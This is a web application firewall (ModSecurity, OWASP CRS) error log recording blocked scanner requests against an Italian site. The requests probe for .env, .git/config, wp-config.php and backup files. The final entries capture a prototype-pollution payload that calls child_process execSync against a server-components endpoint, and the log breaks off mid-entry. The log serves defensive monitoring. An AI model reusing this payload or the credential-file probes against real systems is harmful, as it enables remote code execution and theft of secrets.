[Mon Jan 12 05:19:29.966358 2026] [:error] [pid 1355927] [client 185.177.72.66:45050] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aWR2UU4YgaRMJb38LtMi4gAAAAQ"]
[Mon Jan 12 05:19:29.966574 2026] [:error] [pid 1355927] [client 185.177.72.66:45050] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aWR2UU4YgaRMJb38LtMi4gAAAAQ"]
[Mon Jan 12 05:19:29.966727 2026] [:error] [pid 1355927] [client 185.177.72.66:45050] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aWR2UU4YgaRMJb38LtMi4gAAAAQ"]
[Mon Jan 12 06:02:37.435678 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWSAbSE1xEBhFyXickXrJQAAAAA"]
[Mon Jan 12 06:02:37.435866 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWSAbSE1xEBhFyXickXrJQAAAAA"]
[Mon Jan 12 06:02:37.436004 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWSAbSE1xEBhFyXickXrJQAAAAA"]
[Mon Jan 12 06:02:37.457193 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWSAbSE1xEBhFyXickXrJgAAAAA"]
[Mon Jan 12 06:02:37.457379 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWSAbSE1xEBhFyXickXrJgAAAAA"]
[Mon Jan 12 06:02:37.457516 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWSAbSE1xEBhFyXickXrJgAAAAA"]
[Mon Jan 12 06:02:37.478597 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWSAbSE1xEBhFyXickXrJwAAAAA"]
[Mon Jan 12 06:02:37.478707 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWSAbSE1xEBhFyXickXrJwAAAAA"]
[Mon Jan 12 06:02:37.478862 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWSAbSE1xEBhFyXickXrJwAAAAA"]
[Mon Jan 12 06:02:37.478995 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWSAbSE1xEBhFyXickXrJwAAAAA"]
[Mon Jan 12 06:02:37.500145 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWSAbSE1xEBhFyXickXrKAAAAAA"]
[Mon Jan 12 06:02:37.500307 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWSAbSE1xEBhFyXickXrKAAAAAA"]
[Mon Jan 12 06:02:37.500442 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWSAbSE1xEBhFyXickXrKAAAAAA"]
[Mon Jan 12 06:02:37.522778 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWSAbSE1xEBhFyXickXrKQAAAAA"]
[Mon Jan 12 06:02:37.522939 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWSAbSE1xEBhFyXickXrKQAAAAA"]
[Mon Jan 12 06:02:37.523082 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWSAbSE1xEBhFyXickXrKQAAAAA"]
[Mon Jan 12 06:02:37.544336 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWSAbSE1xEBhFyXickXrKgAAAAA"]
[Mon Jan 12 06:02:37.544520 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWSAbSE1xEBhFyXickXrKgAAAAA"]
[Mon Jan 12 06:02:37.544702 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWSAbSE1xEBhFyXickXrKgAAAAA"]
[Mon Jan 12 06:02:37.566124 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWSAbSE1xEBhFyXickXrKwAAAAA"]
[Mon Jan 12 06:02:37.566313 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWSAbSE1xEBhFyXickXrKwAAAAA"]
[Mon Jan 12 06:02:37.566499 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWSAbSE1xEBhFyXickXrKwAAAAA"]
[Mon Jan 12 06:02:37.588265 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWSAbSE1xEBhFyXickXrLAAAAAA"]
[Mon Jan 12 06:02:37.588459 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWSAbSE1xEBhFyXickXrLAAAAAA"]
[Mon Jan 12 06:02:37.588607 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWSAbSE1xEBhFyXickXrLAAAAAA"]
[Mon Jan 12 06:02:37.609959 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWSAbSE1xEBhFyXickXrLQAAAAA"]
[Mon Jan 12 06:02:37.610082 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWSAbSE1xEBhFyXickXrLQAAAAA"]
[Mon Jan 12 06:02:37.610257 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWSAbSE1xEBhFyXickXrLQAAAAA"]
[Mon Jan 12 06:02:37.610432 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWSAbSE1xEBhFyXickXrLQAAAAA"]
[Mon Jan 12 06:02:37.654602 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aWSAbSE1xEBhFyXickXrLwAAAAA"]
[Mon Jan 12 06:02:37.654909 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aWSAbSE1xEBhFyXickXrLwAAAAA"]
[Mon Jan 12 06:02:37.655070 2026] [:error] [pid 1355923] [client 195.178.110.132:22816] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aWSAbSE1xEBhFyXickXrLwAAAAA"]
[Mon Jan 12 09:53:23.841113 2026] [:error] [pid 1355927] [client 13.40.27.204:58662] [client 13.40.27.204] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aWS2g04YgaRMJb38LtMjHQAAAAQ"]
[Mon Jan 12 09:53:23.841549 2026] [:error] [pid 1355927] [client 13.40.27.204:58662] [client 13.40.27.204] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new 